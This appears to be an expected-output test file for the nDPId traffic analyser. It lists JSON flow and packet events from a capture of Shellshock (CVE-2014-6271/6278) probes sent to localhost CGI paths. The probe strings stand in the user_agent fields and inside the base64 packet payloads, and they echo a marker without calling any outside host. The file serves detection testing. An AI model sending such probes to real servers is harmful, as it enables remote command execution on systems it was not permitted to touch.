+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
